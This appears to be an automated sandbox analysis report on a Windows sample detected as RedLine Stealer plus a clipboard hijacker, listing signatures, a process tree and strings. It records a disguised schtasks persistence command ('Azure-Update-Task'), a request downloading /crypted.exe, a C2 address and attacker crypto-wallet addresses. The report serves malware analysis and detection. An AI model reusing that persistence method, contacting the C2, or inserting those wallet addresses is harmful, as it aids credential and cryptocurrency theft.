Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report eYvT1lg5Dy.exe

Overview

General Information

Sample Name:eYvT1lg5Dy.exe
Analysis ID:490258
MD5:355fbd5060b3bbaf8c5737b4279e9000
SHA1:88fa1113f76294bade7fd9075cd5e4ea76cf5314
SHA256:383f147b7eb4c815bc9def993cff994da41c7395092ceedd3c22d10e130b8c15
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Clipboard Hijacker RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Yara detected Clipboard Hijacker
Multi AV Scanner detection for dropped file
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • eYvT1lg5Dy.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\eYvT1lg5Dy.exe' MD5: 355FBD5060B3BBAF8C5737B4279E9000)
    • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • filename.exe (PID: 5416 cmdline: 'C:\Users\user\AppData\Local\Temp\filename.exe' MD5: D508B954A785BDB77FDEFFCD4C56F8E5)
      • schtasks.exe (PID: 5536 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • sihost.exe (PID: 5784 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe MD5: D508B954A785BDB77FDEFFCD4C56F8E5)
    • schtasks.exe (PID: 6672 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Clipboard Hijacker

{"Crypto Addresses": ["0xb0cd1b2BBAd670F2077a096c3bEd2CdBcC5Fdf88", "TXQvcL1pmAyUH2navHQshfMZnCPodRVDZk", "1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "ltc1qthpmfg386hs6d7693jg3makep2mva9wxzhpc2n", "DQxZ4k7vxFDDLyRM5WgVhdJFD11Sv2vAGz", "0N1Y/53R10U5/BU51N355", "addr1qx7vnvylyguqn7xxee2n5m9l69a7emvcak3m6fc9qvn2xq07lauv8vz70htg7hqjgtg2r90fth2fc4qkwuuezels972qzagye8", "00000L0000T00MON00000000000000000000000Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw00000000000000W0000000", "bc1qns4rqn3fhdzeuv8n3c7jansny9sywjrkdekz2v", "MUeW4pkFQtczm1yvves7LS1JCYpk3NdnzV", "Z1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "bnb13dvx2lhjvh8e4x6qz0manmfwd00h8hwpy37upp", "t1YGnYRkTaDW4kmKNxNTzEoCc434EGtVwJN", "Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw", "44Ro9N6uFUdEAqo3DzHpkqgUPG1xzf1Lfe3F4VbcNSEaLYhdJDyBxyR96FfHai8VHEUYTDA41zhWQKABQ1Zf23Yr2mEawKg", "36dA9es5FtrvSdyPxxLEntQcKp9P6V8KaY"]}

Threatname: RedLine

{"C2 url": ["80.87.192.249:16640"], "Bot Id": "2"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmpJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
    00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000E.00000003.448804837.0000000002C70000.00000004.00000001.sdmpJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
        0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmpJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
          00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.filename.exe.400000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
              14.3.sihost.exe.2c70000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                11.3.filename.exe.2c70000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                  1.2.eYvT1lg5Dy.exe.31a0ee8.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    14.2.sihost.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 11.3.filename.exe.2c70000.0.raw.unpackMalware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["0xb0cd1b2BBAd670F2077a096c3bEd2CdBcC5Fdf88", "TXQvcL1pmAyUH2navHQshfMZnCPodRVDZk", "1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "ltc1qthpmfg386hs6d7693jg3makep2mva9wxzhpc2n", "DQxZ4k7vxFDDLyRM5WgVhdJFD11Sv2vAGz", "0N1Y/53R10U5/BU51N355", "addr1qx7vnvylyguqn7xxee2n5m9l69a7emvcak3m6fc9qvn2xq07lauv8vz70htg7hqjgtg2r90fth2fc4qkwuuezels972qzagye8", "00000L0000T00MON00000000000000000000000Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw00000000000000W0000000", "bc1qns4rqn3fhdzeuv8n3c7jansny9sywjrkdekz2v", "MUeW4pkFQtczm1yvves7LS1JCYpk3NdnzV", "Z1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "bnb13dvx2lhjvh8e4x6qz0manmfwd00h8hwpy37upp", "t1YGnYRkTaDW4kmKNxNTzEoCc434EGtVwJN", "Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw", "44Ro9N6uFUdEAqo3DzHpkqgUPG1xzf1Lfe3F4VbcNSEaLYhdJDyBxyR96FfHai8VHEUYTDA41zhWQKABQ1Zf23Yr2mEawKg", "36dA9es5FtrvSdyPxxLEntQcKp9P6V8KaY"]}
                      Source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["80.87.192.249:16640"], "Bot Id": "2"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: eYvT1lg5Dy.exeVirustotal: Detection: 48%Perma Link
                      Source: eYvT1lg5Dy.exeMetadefender: Detection: 34%Perma Link
                      Source: eYvT1lg5Dy.exeReversingLabs: Detection: 81%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeReversingLabs: Detection: 48%
                      Machine Learning detection for sampleShow sources
                      Source: eYvT1lg5Dy.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeJoe Sandbox ML: detected
                      Source: 11.2.filename.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 14.2.sihost.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeUnpacked PE file: 1.2.eYvT1lg5Dy.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeUnpacked PE file: 11.2.filename.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exeUnpacked PE file: 14.2.sihost.exe.400000.0.unpack
                      Source: eYvT1lg5Dy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\eYvT1lg5Dy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 52.219.104.152:443 -> 192.168.2.6:49741 version: TLS 1.2
                      Source: Binary string: 1C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
                      Source: Binary string: C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
                      Source: Binary string: _.pdb source: eYvT1lg5Dy.exe
                      Source: Binary string: C:\dufire\fukiliyow\xefugopaja.pdb source: filename.exe, 0000000B.00000000.428820278.000000000041B000.00000002.00020000.sdmp, sihost.exe, 0000000E.00000000.440386838.000000000041B000.00000002.00020000.sdmp, filename.exe.1.dr
                      Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /crypted.exe HTTP/1.1Host: cli-4576347563476534786.s3.us-east-2.amazonaws.comConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.6:49737 -> 80.87.192.249:16640
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.249
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: i9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438333852.0000000004FD8000.00000004.00000001.sdmpString found in binary or memory: http://cli-4576347563476534786.s3.us-east-2.amazonaws.com
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequenceResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1$
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512#BinarySecret
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/AsymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Nonce
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Commit
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Committed
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepare
